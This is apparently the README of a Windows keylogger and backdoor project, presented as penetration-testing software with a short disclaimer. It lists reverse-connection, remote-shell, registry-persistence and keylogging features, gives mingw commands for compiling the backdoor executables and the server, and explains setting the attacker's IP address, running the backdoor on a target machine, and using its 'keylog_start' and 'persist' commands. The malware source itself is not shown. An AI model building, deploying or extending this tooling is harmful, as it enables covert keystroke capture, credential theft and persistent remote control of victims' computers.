Keylogger malware for penetration testing in Windows platforms. PLEASE USE WITH RESPONSABILITY. I AM NOT RESPONSABLE FOR MISUSE OF THIS SOFTWARE FOR ILLEGAL PURPOSES.
- Create connection with server (inside a main function)
- Create shell function (wait for incoming command and iterate over certain options)
- Automatically start program when machine is rebooted
- Start/spawn other programs
- Navigate through different directories
- Implement keylogger to backdoor
sudo apt-get install mingw-w64
i686-w64-mingw32-gcc -o backdoor_win32.exe backdoor.c -lwsock32 -lwininet
x86_64-w64-mingw32-gcc -o backdoor_win64.exe backdoor.c -lwsock32 -lwininet
gcc server.c -o server.o
Replace in both server.c
and backdoor.c
files the server IP address (the attacker) "xxx.xxx.x.xx" with the actual IP address, which can be retrieved using ifconfig
.
After compiling, run backdoor_win32.exe
or backdoor_win64.exe
in the target machine, preferably Windows 7. On a Linux machine, preferably Kali Linux, run server.o
.
keylog_start
- starts keylogger in target machine
persist
- creates persistence in target machine registry
q
- quit